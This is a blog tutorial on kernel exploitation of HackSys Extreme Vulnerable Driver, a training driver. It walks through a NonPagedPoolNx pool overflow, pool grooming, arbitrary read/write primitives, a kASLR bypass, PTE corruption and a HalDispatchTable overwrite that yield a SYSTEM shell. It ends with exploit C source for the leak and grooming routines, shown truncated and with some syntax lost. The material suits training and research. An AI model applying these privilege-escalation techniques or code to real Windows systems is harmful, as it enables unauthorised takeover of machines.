This function, which returns an integer value, performs a for loop based on MAX_OBJECT_COUNT to determine if the g_ARWHelperObjectNonPagedPoolNx array, which is an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NXs, has a value assigned for a given index, which starts at 0. For instance, the for loop first checks if the 0th element in the g_ARWHelperObjectNonPagedPoolNx array is assigned a value. If it is assigned, the index into the array is increased by one. This keeps occurring until the for loop can no longer find a value assigned to a given index. When this is the case, the current value used as the counter is assigned to the value FreeIndex. This value is then passed to the assignment operation used to assign the in-scope ARWHelperObject to the array managing all such objects. This loop occurs MAX_OBJECT_COUNT times, which is defined in ArbitraryReadWriteHelperNonPagedPoolNx.h as #define MAX_OBJECT_COUNT 65535. This is the total amount of objects that can be managed by the g_ARWHelperObjectNonPagedPoolNx array.

The tl;dr of what happens here is in the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function is:

  1. Create a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT object called ARWHelperObject
  2. Set the Name member of ARWHelperObject to a buffer on the NonPagedPoolNx, which has a value of 0
  3. Set the Length member of ARWHelperObject to the value specified by the user-supplied input buffer via DeviceIoControl
  4. Assign this object to an array which manages all active PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT objects
  5. Return the address of the ARWHelpeObject to user mode via the output buffer of DeviceIoControl

Here is a diagram of this in action.

Let’s take a look at the next IOCTL handler after CreateArbitraryReadWriteHelperObjectNonPagedPoolNx which is SetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler. This IOCTL handler will take the user buffer supplied by DeviceIoControl, which is expected to be of type ARW_HELPER_OBJECT_IO. This structure is then passed to the function SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, which is prototyped as such:

    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo

Let’s take a look at what this function will do with our input buffer. Recall last time we were able to specify the length that was used in the operation on the size of the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject. Additionally, we were able to return the address of this pointer to user mode.

This function starts off by defining a few variables:

  1. A pointer named Name
  2. A pointer named HelperObjectAddress
  3. An integer value named Index which is assigned to the status STATUS_INVALID_INDEX
  4. An NTSTATUS code

After these values are declared, This function first checks to make sure the input buffer from user mode, the ARW_HELPER_OBJECT_IO pointer, is in user mode. After confirming this, The Name member, which is a pointer, from this user mode buffer is stored into the pointer Name, previously declared in the listing of declared variables. The HelperObjectAddress member from the user mode buffer - which, after the call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, contained the kernel mode address of the PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT ARWHelperObject, is extracted and stored into the declared HelperObjectAddress at the beginning of the function.

A call to GetIndexFromPointer is made, with the address of the HelperObjectAddress as the argument in this call. If the return value is STATUS_INVALID_INDEX, an NTSTATUS code of STATUS_INVALID_INDEX is returned to the caller. If the function returns anything else, the Index value is printed to the screen.

Where does this value come from? GetIndexFromPointer is defined as such.

This function will accept a value of any pointer, but realistically this is used for a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. This function takes the supplied pointer and indexes the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers, g_ARWHelperObjectNonPagedPoolNx. If the value hasn’t been assigned to the array (e.g. if CreateArbitraryReadWriteHelperObjectNonPagedPoolNx wasn’t called, as this will assign any created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX to the array or the object was freed), STATUS_INVALID_INDEX is returned. This function basically makes sure the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is managed by the array. If it does exist, this function returns the index of the array the given object resides in.

Let’s take a look at the next snipped of code from the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

After confirming the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX exists, a check is performed to ensure the Name pointer, which was extracted from the user mode buffer of type PARW_HELPER_OBJECT_IO’s Name member, is in user mode. Note that g_ARWHelperObjectNonPagedPoolNx[Index] is being used in this situation as another way to reference the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, since all g_ARWHelperObjectNonPagedPoolNx is at the end of the day is an array, of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers.

After confirming the buffer is coming from user mode, this function finishes by copying the value of Name, which is a value supplied by us via DeviceIoControl and the ARW_HELPER_OBJECT_IO object, to the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

Let’s test this theory in WinDbg. What we should be looking for here is the value specified by the Name member of our user-supplied ARW_HELPER_OBJECT_IO should be written to the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created in the previous call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Our updated code looks as follows.

The above code should overwrite the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Note that the IOCTL for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x00222067.

We can then set a breakpoint in WinDbg to perform dynamic analysis.

Then we can set a breakpoint on ProbeForRead, which will take the first argument, which is our user-supplied ARW_HELPER_OBJECT_IO, and verify if it is in user mode. We can parse this memory address in WinDbg, which would be in RCX when the function call occurs due to the __fastcall calling convention, and see that this not only is a user-mode buffer, but it is also the object we intended to send from user mode for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

This HelperObjectAddress value is the address of the previously created/associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. We can also verify this in WinDbg.

Recall from earlier that the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object has it’s Length member taken from the Length sent from our user-mode ARW_HELPER_OBJECT_IO structure. The Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is also initialized to zero, per the RtlFillMemory call from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx routine - which initializes the Name buffer to 0 (recall the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is actually a buffer that was allocated via ExAllocatePoolWithTag by using the specified Length of our ARW_HELPER_OBJECT_IO structure in our DeviceIoControl call).

ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is the member that should be overwritten with the contents of the ARW_HELPER_OBJECT_IO object we sent from user mode, which currently is set to 0x4141414141414141. Knowing this, let’s set a breakpoint on the RtlCopyMemory routine, which will show up as memcpy in HEVD via WinDbg.

This fails. The error code here is actually access denied. Why is this? Recall that there is a one final call to ProbeForRead directly before the memcpy call.


The Name variable here is extracted from the user-mode buffer ARW_HELPER_OBJECT_IO. Since we supplied a value of 0x4141414141414141, this technically isn’t a valid address and the call to ProbeForRead will not be able to locate this address. Instead, let’s create a user-mode pointer and leverage it instead!

After executing the code again and hitting all the breakpoints, we can see that execution now reaches the memcpy routine.

After executing the memcpy routine, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function now points to the value specified by our user-mode buffer, 0x4141414141414141.

We are starting to get closer to our goal! You can see this is pretty much an uncontrolled arbitrary write primitive in and of itself. The issue here however is that the value we can overwrite, which is ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is a pointer which is allocated in the kernel via ExAllocatePoolWithTag. Since we cannot directly control the address stored in this member, we are limited to only overwriting what the kernel provides us. The goal for us will be to use the pool overflow vulnerability to overcome this (in the future).

Before getting to the exploitation phase, we need to investigate one more IOCTL handler, plus the IOCTL handler for deleting objects, which should not be time consuming.

The last IOCTL handler to investigate is the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler IOCTL handler.

This handler passes the user-supplied buffer, which is of type ARW_HELPER_OBJECT_IO to GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx. This function is identical to the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function, in that it will copy one Name member to another Name member, but in reverse order. As seen below, the Name member used in the destination argument for the call to RtlCopyMemory is from the user-supplied buffer this time.

This means that if we used the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function to overwrite the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then we could use the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx to get the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and bubble it up back to user mode. Let’s modify our code to outline this. The IOCTL code to reach the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x0022206B.

In this case we do not need WinDbg to validate anything. We can simply set the contents of our ARW_HELPER_OBJECT_IO.Name member to junk as a POC that after the IOCL call to reach GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, this member will be overwritten by the contents of the associated/previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which will be 0x4141414141414141.

Since tempBuffer is assigned to ARW_HELPER_OBJECT_IO.Name, this is technically the value that will inherit the contents of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name in the memcpy operation from the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function. As we can see, we can successfully retrieve the contents of the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name object. Again, however, the issue is that we are not able to choose what ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name points to, as this is determined by the driver. We will use our pool overflow vulnerability soon to overcome this limitation.

The last IOCTL handler is the delete operation, found in DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler.

This IOCTL handler parses the input buffer from DeviceIoControl as an ARW_HELPER_OBJECT_IO structure. This buffer is then passed to the DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx function.

This function is pretty simplistic - since the HelperObjectAddress is pointing to the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, this member is used in a call to ExAllocateFreePoolWithTag to free the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Additionally, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member, which also is allocated by ExAllocatePoolWithTag is freed.

Now that we know all of the ins-and-outs of the driver’s functionality, we can continue (please note that we are fortunate to have source code in this case. Leveraging a disassembler make take a bit more time to come to the same conclusions we were able to come to).

Okay, Now Let’s Get Into Exploitation (For Real This Time)

We know that our situation currently allows for an uncontrolled arbitrary read/write primitive. This is because the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member is set currently to the address of a pool allocation via ExAllocatePoolWithTag. With our pool overflow we will try to overwrite this address to a meaningful address. This will allow for us to corrupt a controlled address - thus allowing us to obtain an arbitrary read/write primitive.

Our strategy for grooming the pool, due to all of these objects being the same size and being allocated on the same pool type (NonPagedPoolNx), will be as follows:

  1. “Fill the holes” in the current page servicing allocations of size 0x20
  3. Leverage the read/write primitive to write our shellcode, one QWORD at a time, to KUSER_SHARED_DATA+0x800 and flip the no-eXecute bit to bypass kernel-mode DEP

Recall earlier the sentiment about needing to preserve _POOL_HEADER structures? This is where everything goes full circle for us. Recall from Part 1 that the kLFH still uses the legacy _POOL_HEADER structures to process and store metadata for pool chunks. This means there is no encoding going on, and it is possible to hardcode the header into the exploit so that when the pool overflow occurs we can make sure when the header is overwritten it is overwritten with the same content as before.

Let’s inspect the value of a _POOL_HEADER of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we would be overflowing into.

Since this chunk is 16 bytes and will be part of the kLFH, it is prepended with a standard _POOL_HEADER structure. Since this is the case, and there is no encoding, we can simply hardcode the value of the _POOL_HEADER (recall that the _POOL_HEADER will be 0x10 bytes before the value returned by ExAllocatePoolWithTag). This means we can hardcode the value 0x6b63614802020000 into our exploit so that at the time of the overflow into the next chunk, which should be into one of these ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects we have previously sprayed, the first 0x10 bytes that are overflown of this chunk, which will be the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX’s _POOL_HEADER, will be preserved and kept as valid, bypassing the earlier issue shown when an invalid header occurs.

Knowing this, and knowing we have a bit of work to do, let’s rearrange our current exploit to make it more logical. We will create three functions for grooming:

  1. fillHoles()
  2. groomPool()
  3. pokeHoles()

These functions can be seen below.




Please refer to Part 1 to understand what this is doing, but essentially this technique will fill any fragments in the corresponding kLFH bucket in the NonPagedPoolNx and force the memory manager to (theoretically) give us a new page to work with. We then fill this new page with objects we control, e.g. the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects

Since we have a controlled pool-based overflow, the goal will be to overwrite any of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structures with the “vulnerable chunk” that copies memory into the allocation, without any bounds checking. Since the vulnerable chunk and the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunks are of the same size, they will both wind up being adjacent to each other theoretically, since they will land in the same kLFH bucket.

The last function, called readwritePrimitive() contains most of the exploit code.

The first bit of this function creates a “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via an ARW_HELPER_OBJECT_IO object, and performs the filling of the pool chunks, fills the new page with objects we control, and then frees every other one of these objects.

After freeing every other object, we then replace these freed slots with our vulnerable buffers. We also create a “standalone/main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Also note that the pool header is 16 bytes in size, meaning it is 2 QWORDS, hence “Padding”.

What we actually hope to do here, is the following.

We want to use a controlled write to only overwrite the first member of this adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, Name. This is because we have additional primitives to control and return these values of the Name member as shown in this blog post. The issue we have had so far, however, is the address of the Name member of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is completely controlled by the driver and cannot be influenced by us, unless we leverage a vulnerability (a la pool overflow).

As shown in the readwritePrimitive() function, the goal here will be to actually corrupt the adjacent chunk(s) with the address of the “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we will manage via ARW_HELPER_OBJECT_IO.HelperObjectAddress. We would like to corrupt the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a precise overflow to corrupt the Name value with the address of our “main” object. Currently this value is set to 0x9090909090909090. Once we prove this is possible, we can then take this further to obtain the eventual read/write primitive.

Setting a breakpoint on the TriggerBufferOverflowNonPagedPoolNx routine in HEVD.sys, and setting an additional breakpoint on the memcpy routine, which performs the pool overflow, we can investigate the contents of the pool.

As seen in the above image, we can clearly see we have flooded the pool with controlled ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, as well as the “current” chunk - which refers to the vulnerable chunk used in the pool overflow. All of these chunks are prefaced with the Hack tag.

Then, after stepping through execution until the mempcy routine, we can inspect the contents of the next chunk, which is 0x10 bytes after the value in RCX, which is used in the destination for the memory copy operation. Remember - our goal is to overwrite the adjacent pool chunks. Stepping through the operation to clearly see that we have corrupted the next pool chunk, which is of type ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

We can validate that the address which was written out-of-bounds is actually the address of the “main”, standalone ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object we created.

Remember - a _POOL_HEADER structure is 0x10 bytes in length. This makes every pool chunk within this kLFH bucket 0x20 bytes in total size. Since we want to overflow adjacent chunks, we need to preserve the pool header. Since we are in the kLFH, we can just hardcode the pool header, as we have proven, to satisfy the pool and to avoid any crashes which may arise as a result of an invalid pool chunk. Additionally, we can corrupt the first 0x10 bytes of the value in RCX, which is the destination address in the memory copy operation, because there are 0x20 bytes in the “vulnerable” pool chunk (which is used in the copy operation). The first 0x10 bytes are the header and the second half we actually don’t care about, as we are worried about corrupting an adjacent chunk. Because of this, we can set the first 0x10 bytes of our copy, which writes out of bounds, to 0x10 to ensure that the bytes which are copied out of bounds are the bytes that comprise the pool header of the next chunk.

We have now successfully performed out out-of-bounds write via a pool overflow, and have corrupted an adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object’s Name member, which is dynamically allocated on the pool before had and has an address we do not control, unless we use a vulnerability such as an out-of-bounds write, with an address we do control, which is the address of the object created previously.

Arbitrary Read Primitive

Although it may not be totally apparent currently, our exploit strategy revolves around our ability to use our pool overflow to write out-of-bounds. Recall that the “Set” and “Get” capabilities in the driver allow us to read and write memory, but not at controlled locations. The location is controlled by the pool chunk allocated for the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

Let’s take a look at the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The corrupted object is one of the many sprayed objects. We successfully overwrote the Name member of this object with the address of the “main”, or standalone ARE_HELPER_OBJECT_NON_PAGED_POOL_NX object.

We know that it is possible to set the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structure via the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function through an IOCTL invocation. Since we are now able to control the value of Name in the corrupted object, let’s see if we can’t abuse this through an arbitrary read primitive.

Let’s break this down. We know that we currently have a corrupted object with a Name member that is set to the value of another object. For brevity, we can recall this from the previous image.

If we do a “Set” operation currently on the corrupted object, shown in the dt command and currently has its Name member set to 0xffffa00ca378c210, it will perform this operation on the Name member. However, we know that the Name member is actually currently set to the value of the “main” object via the out-of-bounds write! This means that performing a “Set” operation on the corrupted object will actually take the address of the main object, since it is set in the Name member, dereference it, and write the contents specified by us. This will cause our main object to then point to whatever we specify, instead of the value of ffffa00ca378c3b0 currently outlined in the memory contents shown by dq in WinDbg. How does this turn into an arbitrary read primitive? Since our “main” object will point to whatever address we specify, the “Get” operation, if performed on the “main” object, will then dereference this address specified by us and return the value!

In WinDbg, we can “mimic” the “Set” operation as shown.

Performing the “Set” operation on the corrupted object will actually set the value of our main object to whatever is specified to the user, due to us corrupting the previous random address with the pool overflow vulnerability. At this point, performing the “Get” operation on our main object, since it was set to the value specified by the user, would dereference the value and return it to us!

At this point we need to identify what out goal is. To comprehensively bypass kASLR, our goal is as follows:

  1. Use the base address of HEVD.sys from the original exploit in part one to provide the offset to the Import Address Table
  2. Supply an IAT entry that points to ntoskrnl.exe to the exploit to be arbitrarily read from (thus obtaining a pointer to ntoskrnl.exe)
  3. Calculate the distance from the pointer to the kernel to obtain the base

We can update our code to outline this. As you may recall, we have groomed the pool with 5000 ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects. However, we did not spray the pool with 5000 “vulnerable” objects. Since we have groomed the pool, we know that our vulnerable object we can arbitrarily write past will end up adjacent to one of the objects used for grooming. Since we only trigger the overflow once, and since we have already set Name values on all of the objects used for grooming, a value of 0x9090909090909090, we can simply use the “Get” operation in order to view each Name member of the objects used for grooming. If one of the objects does not contain NOPs, this is indicative that the pool overflow outlined previously to corrupt the Name value of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX has succeeded.

After this, we can then use the same primitive previously mentioned about now using the “Set” functionality in HEVD to set the Name member of the targeted corrupted object, which would actually “trick” the program to overwrite the Name member of the corrupted object, which is actually the address of the “standalone”/main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. The overwrite will dereference the standalone object, thus allowing for an arbitrary read primitive since we have the ability to then later use the “Get” functionality on the main object later.

We then can add a “press enter to continue” function to our exploit to pause execution after the main object is printed to the screen, as well as the corrupted object used for grooming that resides within the 5000 objects used for grooming.

We then can take the address 0xffff8e03c8d5c2b0, which is the corrupted object, and inspect it in WinDbg. If all goes well, this address should contain the address of the “main” object.

Comparing the Name member to the previous screenshot in which the exploit with the “press enter to continue” statement is in, we can see that the pool corruption was successful and that the Name member of one of the 5000 objects used for grooming was overwritten!

Now, if we were to use the “Set” functionality of HEVD and supply the ARW_HELPER_OBJECT_NON_PAGED_POOL object that was corrupted and also used for grooming, at address 0xffff8e03c8d5c2b0, HEVD would use the value stored in Name, dereference it, and overwrite it. This is because HEVD is expecting one of the pool allocations previously showcased for Name pointers, which we do not control. Since we have supplied another address, what HEVD will actually do is perform the overwite, but this time it will overwrite the pointer we supplied, which is another ARW_HELPER_OBJECT_NON_PAGED_POOL. Since the first member of one of these objects has a member Name, what will happen is that HEVD will actually write whatever we supply to the Name member of our main object! Let’s view this in WinDbg.

As our exploit showcased, we are using HEVD+0x2038 in this case. This value should be written to our main object.

As you can see, our main object now has its Name member pointing to HEVD+0x2038, which is a pointer to the kernel! After running the full exploit, we have now obtained the base address of HEVD from the previous exploit, and now the base of the kernel via an arbitrary read by way of pool overflow - all from low integrity!

The beauty of this technique of leveraging two objects should be clear now - we do not have to constantly perform overflows of objects in order to perform exploitation. We can now just simply use the main object to read!

Our exploitation technique will be to corrupt the page table entries of our eventual memory page our shellcode resides in. If you are not familiar with this technique, I have two blogs written on the subject, plus one about memory paging. You can find them here: one, two, and three.

For our purposes, we will need to following items arbitrarily read:

  1. nt!MiGetPteAddress+0x13 - this contains the base of the PTEs needed for calculations
  2. PTE bits that make up the shellcode page
  3. [nt!HalDispatchTable+0x8] - used to execute our shellcode. We first need to preserve this address by reading it to ensure exploit stability

Let’s add a routine to address the first issue, reading the base of the page table entries. We can calculate the offset to the function MiGetPteAddress+0x13 and then use our arbitrary read primitive.

Leveraging the exact same method as before, we can see we have defeated page table randomization and have the base of the page table entries in hand!

The next step is to obtain the PTE bits that make up the shellcode page. We will eventually write our shellcode to KUSER_SHARED_DATA+0x800 in kernel mode, which is at a static address of 0xfffff87000000800. We can instrument the routine to obtain this information in C.

After running the updated exploit, we can see that we are able to leak the PTE bits for KUSER_SHARED_DATA+0x800, where our shellcode will eventually reside.

Note that the !pte extension in WinDbg was giving myself trouble. So, from the debuggee machine, I ran WinDbg “classic” with local kernel debugging (lkd) to show the contents of !pte. Notice the actual virtual address for the PTE has changed, but the contents of the PTE bits are the same. This is due to myself rebooting the machine and kASLR kicking in. The WinDbg “classic” screenshot is meant to just outline the PTE contents.

You can view this previous blog) from myself to understand the permissions KUSER_SHARED_DATA has, which is write but no execute. The last item we need is the contents of [nt!HalDispatchTable].

After executing the updated code, we can see we have preserved the value [nt!HalDispatchTable+0x8].

The last item on the agenda is the write primitive, which is 99 percent identical to the read primitive. After writing our shellcode to kernel mode and then corrupting the PTE of the shellcode page, we will be able to successfully escalate our privileges.

Arbitrary Write Primitive

Leveraging the same concepts from the arbitrary read primitive, we can also arbitrarily overwrite 64-bit pointers! Instead of using the “Get” operation in order to fetch the dereferenced contents of the Name value specified by the “corrupted” ARW_HELPER_NON_PAGED_POOL_NX object, and then returning this value to the Name value specified by the “main” object, this time we will set the Name value of the “main” object not to a pointer that receives the contents, but to the value of what we would like to overwrite memory with. In this case, we want to set this value to the value of shellcode, and then set the Name value of the “corrupted” object to KUSER_SHARED_DATA+0x800 incrementally.

From here we can run our updated exploit. Since we have created a loop to automate the writing process, we can see we are able to arbitrarily write the contents of the 9 QWORDS which make up our shellcode to KUSER_SHARED_DATA+0x800!

Awesome! We have now successfully performed the arbitrary write primitive! The next goal is to corrupt the contents of the PTE for the KUSER_SHARED_DATA+0x800 page.

From here we can use WinDbg classic to inspect the PTE before and after the write operation.

Awesome! Our exploit now just needs three more things:

  1. Corrupt [nt!HalDispatchTable+0x8] to point to KUSER_SHARED_DATA+0x800
  2. Invoke ntdll!NtQueryIntervalPRofile, which will perform the transition to kernel mode to invoke [nt!HalDispatchTable+0x8], thus executing our shellcode
  3. Restore [nt!HalDispatchTable+0x8] with the arbitrary write primitive

Let’s update our exploit code to perform step one.

After executing the updated code, we can see that we have successfully overwritten nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 - which contains our shellcode!

Next, we can add the routing to dynamically resolve ntdll!NtQueryIntervalProfile, invoke it, and then restore [nt!HalDispatchTable+0x8]

The final result is a SYSTEM shell from low integrity!

“…Unless We Conquer, As Conquer We Must, As Conquer We Shall.”

Hopefully you, as the reader, found this two-part series on pool corruption useful! As aforementioned in the beginning of this post, we must expect mitigations such as VBS and HVCI to be enabled in the future. ROP is still a viable alternative in the kernel due to the lack of kernel CET (kCET) at the moment (although I am sure this is subject to change). As such, techniques such as the one outlined in this blog post will soon be deprecated, leaving us with fewer options for exploitation than which we started. Data-only attacks are always viable, and there have been more novel techniques mentioned, such as this tweet sent to myself by Dmytro, which talks about leveraging ROP to forge kernel function calls even with VBS/HVCI enabled. As the title of this last section of the blog articulates, where there is a will there is a way - and although the bar will be raised, this is only par for the course with exploit development over the past few years. KPP + VBS + HVCI + kCFG/kXFG + SMEP + DEP + kASLR + kCET and many other mitigations will prove very useful for blocking most exploits. I hope that researchers stay hungry and continue to push the limits with this mitigations to find more novel ways to keep exploit development alive!

Peace, love, and positivity :-).

Here is the final exploit code, which is also available on my GitHub:

// HackSysExtreme Vulnerable Driver: Pool Overflow + Memory Disclosure
// Author: Connor McGarr (@33y0re)

#include <windows.h>
#include <stdio.h>

// typdef an ARW_HELPER_OBJECT_IO struct
typedef struct _ARW_HELPER_OBJECT_IO
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;

// Create a global array of ARW_HELPER_OBJECT_IO objects to manage the groomed pool allocations
ARW_HELPER_OBJECT_IO helperobjectArray[5000] = { 0 };

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Leak the base of HEVD.sys
unsigned long long memLeak(HANDLE driverHandle)
    // Array to manage handles opened by CreateEventA
    HANDLE eventObjects[5000];

    // Spray 5000 objects to fill the new page
    for (int i = 0; i <= 5000; i++)
        // Create the objects
        HANDLE tempHandle = CreateEventA(

        // Assign the handles to the array
        eventObjects[i] = tempHandle;

    // Check to see if the first handle is a valid handle
    if (eventObjects[0] == NULL)
        printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());

        return 0x1;
        printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

        // Close half of the handles
        for (int i = 0; i <= 5000; i += 2)
            BOOL tempHandle1 = CloseHandle(

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle1)
                printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;

        printf("[+] Poked holes in the new pool page!\n");

        // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
        // kLFH should automatically fill the freed holes with the UAF objects
        DWORD bytesReturned;

        for (int i = 0; i < 2500; i++)

        printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

        // Close the rest of the event objects
        for (int i = 1; i <= 5000; i += 2)
            BOOL tempHandle2 = CloseHandle(

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle2)
                printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;

        // Array to store the buffer (output buffer for DeviceIoControl) and the base address
        unsigned long long outputBuffer[100];
        unsigned long long hevdBase = 0;

        // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
        // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

        for (int i = 0; i <= 100; i++)
            // Return buffer
            DWORD bytesReturned1;



        printf("[+] Successfully triggered the out-of-bounds read!\n");

        // Parse the output
        for (int i = 0; i <= 100; i++)
            // Kernel mode address?
            if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
                printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
                printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

                // Store the variable for future usage
                hevdBase = outputBuffer[i] - 0x880CC;

                // Return the value of the base of HEVD
                return hevdBase;

// Function used to fill the holes in pool pages
void fillHoles(HANDLE driverHandle)
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedFill;

    for (int i = 0; i <= 5000; i++)
        // Set the Name value to 0x9090909090909090
        tempObject.Name = &nameValue;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject;

    printf("[+] Sprayed ARW_HELPER_OBJECT_IO objects to fill holes in the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");

// Fill up the new page within the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
void groomPool(HANDLE driverHandle)
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject1 = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue1 = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject1.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedGroom;

    for (int i = 0; i <= 5000; i++)
        // Set the Name value to 0x9090909090909090
        tempObject1.Name = &nameValue1;

